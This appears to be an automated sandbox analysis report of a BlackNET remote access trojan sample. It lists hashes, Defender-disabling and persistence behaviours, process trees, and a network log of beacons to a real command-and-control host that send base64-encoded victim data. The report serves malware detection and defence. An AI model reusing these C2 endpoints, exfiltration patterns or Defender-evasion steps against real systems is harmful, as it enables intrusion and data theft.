Analysis

  • max time kernel
    120s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-10-2024 11:34

General

  • Target

    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe

  • Size

    80KB

  • MD5

    05644c696c4cfcd50af83ac4e2f1ff50

  • SHA1

    b6cc01ee14e43facaccf9bfa7007481bb1e04751

  • SHA256

    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7

  • SHA512

    ae9b804d75feb586909a9b030fc9cdbeb1f6c733d8ba43cd3b099e41993bb9eb6399f896725c810a0e1827ded330295cfe88626ec6a15935a13c5185dd7a4fab

  • SSDEEP

    1536:dPvK/3zvzVQtCsscKvWBjzJxuOmb54vHTL6lm:diqCspZzVmb5uHv6lm

Malware Config

Signatures

  • BlackNET

    BlackNET is an open source remote access tool written in VB.NET.

  • BlackNET payload 1 IoCs
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
    "C:\Users\Admin\AppData\Local\Temp\302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4132
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3356
    • C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe
      "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3264
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Get-MpPreference -verbose
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:8

Network

  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    lovegunny.net
    WindowsUpdate.exe
    Remote address:
    8.8.8.8:53
    Request
    lovegunny.net
    IN A
    Response
    lovegunny.net
    IN A
    103.27.237.159
  • flag-vn
    GET
    https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=
    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I= HTTP/1.1
    Host: lovegunny.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:34:56 GMT
    Content-Length: 1245
  • flag-vn
    GET
    https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
    Host: lovegunny.net
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:34:56 GMT
    Content-Length: 1245
  • flag-vn
    GET
    https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz
    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //getCommand.php?id=SGFjS2VkX0REQTlERjEz HTTP/1.1
    Host: lovegunny.net
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:34:56 GMT
    Content-Length: 1245
  • flag-us
    DNS
    140.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    140.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    159.237.27.103.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    159.237.27.103.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-vn
    GET
    https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=
    WindowsUpdate.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I= HTTP/1.1
    Host: lovegunny.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:34:59 GMT
    Content-Length: 1245
  • flag-vn
    GET
    https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
    WindowsUpdate.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
    Host: lovegunny.net
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:35:00 GMT
    Content-Length: 1245
  • flag-vn
    GET
    https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz
    WindowsUpdate.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //getCommand.php?id=SGFjS2VkX0REQTlERjEz HTTP/1.1
    Host: lovegunny.net
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:35:00 GMT
    Content-Length: 1245
  • flag-vn
    GET
    https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
    WindowsUpdate.exe
    Remote address:
    103.27.237.159:443
    Request
    GET //receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz HTTP/1.1
    Host: lovegunny.net
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Access-Control-Allow-Origin: http://localhost:3000
    Access-Control-Allow-Headers: Content-Type
    Access-Control-Allow-Credentials: true
    Date: Wed, 23 Oct 2024 11:35:00 GMT
    Content-Length: 1245
  • flag-us
    DNS
    56.163.245.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.163.245.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    99.209.201.84.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.209.201.84.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    77.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.190.18.2.in-addr.arpa
    IN PTR
    Response
    77.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-77deploystaticakamaitechnologiescom
  • flag-us
    DNS
    205.47.74.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.47.74.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 673255
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: AE10BA836F1E40609CB3644ED6232B77 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:46Z
    date: Wed, 23 Oct 2024 11:36:46 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 668226
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: AA745BDB1228441D8161E1E5421BB41A Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
    date: Wed, 23 Oct 2024 11:36:47 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 944899
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 3F65CA758BBA43F2A4FA8E6F88C5EBE1 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
    date: Wed, 23 Oct 2024 11:36:47 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 579336
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 10432A1722B0409BA88A038D88889B27 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
    date: Wed, 23 Oct 2024 11:36:47 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 761345
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 9A882466A33B49C89EF50A6F5B09EEE0 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
    date: Wed, 23 Oct 2024 11:36:47 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 837003
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 6FFCCED3731B42B19DDE5EFEC91DC819 Ref B: LON601060105029 Ref C: 2024-10-23T11:36:47Z
    date: Wed, 23 Oct 2024 11:36:47 GMT
  • flag-us
    DNS
    10.28.171.150.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    10.28.171.150.in-addr.arpa
    IN PTR
    Response
  • 103.27.237.159:443
    https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz
    tls, http
    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7N.exe
    1.3kB
    8.8kB
    12
    11

    HTTP Request

    GET https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=

    HTTP Response

    404

    HTTP Request

    GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz

    HTTP Response

    404

    HTTP Request

    GET https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz

    HTTP Response

    404
  • 103.27.237.159:443
    https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz
    tls, http
    WindowsUpdate.exe
    1.4kB
    8.9kB
    13
    12

    HTTP Request

    GET https://lovegunny.net//connection.php?data=SGFjS2VkX0REQTlERjEzfEJOfEhHTkJXQkdXfEJOfE1pY3Jvc29mdCBXaW5kb3dzIDEwIFByb3xCTnxOL0F8Qk58T25saW5lfEJOfG5vfEJOfEFkbWluaXN0cmF0b3I=

    HTTP Response

    404

    HTTP Request

    GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz

    HTTP Response

    404

    HTTP Request

    GET https://lovegunny.net//getCommand.php?id=SGFjS2VkX0REQTlERjEz

    HTTP Response

    404
  • 103.27.237.159:443
    https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz
    tls, http
    WindowsUpdate.exe
    698 B
    1.9kB
    7
    5

    HTTP Request

    GET https://lovegunny.net//receive.php?command=T25saW5l&vicID=SGFjS2VkX0REQTlERjEz

    HTTP Response

    404
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.6kB
    7.3kB
    17
    13
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.5kB
    6.9kB
    16
    13
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.5kB
    6.9kB
    16
    13
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.3kB
    662 B
    12
    8
  • 150.171.28.10:443
    https://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    157.9kB
    4.6MB
    3344
    3339

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418610_1CWE7N9O9P5V6VACF&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239398629842_1ZAQRRM6HYDFONDBE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360422984_1O5I4N56JBATVHLO0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418609_1GWNOVIVAOEBFVIZK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239398629830_1RPYGH00DJD1WMKQO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    lovegunny.net
    dns
    WindowsUpdate.exe
    59 B
    75 B
    1
    1

    DNS Request

    lovegunny.net

    DNS Response

    103.27.237.159

  • 8.8.8.8:53
    140.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    140.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    159.237.27.103.in-addr.arpa
    dns
    73 B
    123 B
    1
    1

    DNS Request

    159.237.27.103.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    56.163.245.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    56.163.245.4.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    99.209.201.84.in-addr.arpa
    dns
    72 B
    132 B
    1
    1

    DNS Request

    99.209.201.84.in-addr.arpa

  • 8.8.8.8:53
    77.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    77.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    205.47.74.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    205.47.74.20.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    170 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    150.171.28.10
    150.171.27.10

  • 8.8.8.8:53
    10.28.171.150.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    10.28.171.150.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    77d622bb1a5b250869a3238b9bc1402b

    SHA1

    d47f4003c2554b9dfc4c16f22460b331886b191b

    SHA256

    f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

    SHA512

    d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

  • C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe

    Filesize

    80KB

    MD5

    05644c696c4cfcd50af83ac4e2f1ff50

    SHA1

    b6cc01ee14e43facaccf9bfa7007481bb1e04751

    SHA256

    302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7

    SHA512

    ae9b804d75feb586909a9b030fc9cdbeb1f6c733d8ba43cd3b099e41993bb9eb6399f896725c810a0e1827ded330295cfe88626ec6a15935a13c5185dd7a4fab

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_biu1b2ww.e1k.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3264-63-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/3264-64-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/3264-62-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/3264-33-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/3264-32-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/3264-31-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

